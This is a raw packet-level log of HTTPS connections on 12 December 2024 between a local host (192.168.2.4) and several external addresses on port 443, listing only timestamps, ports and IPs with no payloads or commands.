                                                                                                                                                                                                          Dec 12, 2024 00:28:58.553575993 CET44349761104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.553735018 CET49761443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.561928988 CET44349761104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.562010050 CET49761443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.569752932 CET44349761104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.569839954 CET49761443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.577020884 CET44349761104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.577116013 CET49761443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.577146053 CET44349761104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.577181101 CET44349761104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.577235937 CET49761443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.577313900 CET49761443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.577346087 CET44349761104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.579787016 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.579885960 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.579991102 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.580156088 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.580176115 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.596462011 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.639373064 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.718683004 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.718785048 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.718888998 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.719083071 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:58.719122887 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.254795074 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.255007982 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.255091906 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.257894993 CET49747443192.168.2.4104.21.73.64
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.257915974 CET44349747104.21.73.64192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.393480062 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.393738985 CET49764443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.393795967 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.394120932 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.394404888 CET49764443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.394485950 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.394537926 CET49764443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.398920059 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.398958921 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.399096966 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.399229050 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.399240017 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.435329914 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.439449072 CET49764443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.801409006 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.801749945 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.801811934 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.802967072 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.803566933 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.803750038 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.803981066 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.843147993 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.843242884 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.843308926 CET49764443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.843919039 CET49764443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.843960047 CET44349764104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.847352028 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.933099031 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.934477091 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.934521914 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.935048103 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.935349941 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.935483932 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.935523033 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.935580015 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.935637951 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:28:59.975595951 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.246831894 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.246949911 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247052908 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247143030 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247148991 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247215033 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247256994 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247311115 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247401953 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.247417927 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.255583048 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.255645037 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.255656958 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.266999006 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.267064095 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.267076015 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.319303989 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.368731022 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.412038088 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.412098885 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.442431927 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.442514896 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.442625046 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.442688942 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.442759037 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.450108051 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453346968 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453465939 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453551054 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453636885 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453685999 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453722000 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453752995 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453793049 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453831911 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.453850985 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.457963943 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.458044052 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.458072901 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.462806940 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.462874889 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.462898970 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.465460062 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.465552092 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.465564966 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.473149061 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.473217964 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.473231077 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.480817080 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.480890989 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.480911016 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.488432884 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.488522053 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.488533974 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.503737926 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.503798008 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.503809929 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.504606009 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.504637003 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.511280060 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.511393070 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.511456013 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.511519909 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.511594057 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.518419027 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.525710106 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.525935888 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.525954008 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.526000023 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.526057959 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.532797098 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.559204102 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.572650909 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.572763920 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.576589108 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.576766968 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.576831102 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.618669033 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.625961065 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.630542994 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.630553961 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.630853891 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.632173061 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.632246017 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.633188009 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.633217096 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.633300066 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.633363962 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.633425951 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.633451939 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.633457899 CET4434976735.190.80.1192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.637711048 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.637777090 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.637794018 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.645134926 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.646655083 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.646723986 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.646738052 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.646795988 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.648571968 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.648745060 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.648808002 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655585051 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655605078 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655673981 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655693054 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655752897 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655865908 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655929089 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.655949116 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.663013935 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.663089037 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.663103104 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.664005995 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.664024115 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.664081097 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.672215939 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.672303915 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.672317028 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.672379971 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.676472902 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.676543951 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.677428961 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.677494049 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.677508116 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.682084084 CET49767443192.168.2.435.190.80.1
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.684631109 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.684700012 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.684775114 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.684839964 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.684863091 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.691970110 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.692065954 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.692085028 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.692712069 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.692804098 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.696981907 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.697066069 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.699189901 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.699270010 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.699290991 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.705133915 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.705202103 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.706485033 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.706549883 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.706572056 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.713179111 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.713268042 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.713494062 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.713572979 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.713592052 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.717418909 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.717489004 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.720482111 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.720557928 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.720577002 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.725593090 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.725672960 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.727458954 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.727524996 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.727544069 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.752644062 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.752758980 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.774499893 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.774521112 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.820492983 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.823914051 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.824008942 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.830332994 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.830411911 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836714029 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836781025 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836808920 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836863995 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836865902 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836889029 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836889982 CET44349765104.18.95.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836940050 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.836967945 CET49765443192.168.2.4104.18.95.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.837244987 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.839265108 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.839334011 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.839354038 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.843583107 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.843648911 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.843667984 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.852092028 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.852175951 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.852194071 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.852255106 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.860188007 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.860213041 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.860255003 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.868257046 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.868277073 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.868350029 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.868350029 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.868418932 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.876338005 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.876404047 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.876421928 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.876487970 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.880340099 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.880359888 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.880403996 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.888303041 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.888367891 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.888381958 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.888439894 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.896419048 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.896491051 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.900453091 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.900563002 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.908499956 CET44349766104.18.94.41192.168.2.4
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.908571005 CET49766443192.168.2.4104.18.94.41
                                                                                                                                                                                                          Dec 12, 2024 00:29:00.916526079 CET44349766104.18.94.41192.168.2.4
